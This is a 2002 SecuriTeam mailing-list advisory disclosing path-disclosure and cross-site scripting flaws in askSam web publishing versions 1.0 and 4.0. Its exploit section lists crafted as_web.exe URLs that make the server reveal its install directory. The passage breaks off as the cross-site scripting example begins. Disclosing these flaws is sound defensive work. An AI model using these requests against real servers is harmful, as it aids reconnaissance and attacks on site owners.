[NT] askSam Cross Site Scripting and Path Disclosure Vulnerabilities
From: support@securiteam.comDate: 05/04/02
- Previous message: support@securiteam.com: "[UNIX] PHPImageView XSS Vulnerability and Information Disclosure"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Sat, 4 May 2002 22:40:27 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
askSam Cross Site Scripting and Path Disclosure Vulnerabilities
------------------------------------------------------------------------
SUMMARY
<http://www.asksam.com/brochure.asp> askSam will help you turn your
information into a valuable asset. askSam is a different kind of database
- a database designed for users rather than programmers. Two security
vulnerabilities in the product allow attackers to both cause Cross Site
Scripting vulnerability and cause it to reveal sensitive information on
itself (the path it is installed in).
DETAILS
Vulnerable systems:
askSam version 1.0
askSam version 4.0
Exploits:
Path Disclosure
Accessing any of the following URLs:
http://host/as_web.exe?Command=search&file=non-existant-file&request=&MaxHits=10&NumLines=1
http://host/as_web.exe?non-existant
http://host/as_web4.exe?Command=First&File=non-existant-file
Will cause the server to return an error indicating where it looked for
the file that was not found, thus revealing the true directory structure
used by the server.
Cross Site Scripting
By accessing the following URL:
http://host/as_web.exe?wpubdoc.ask+B+Error*Messages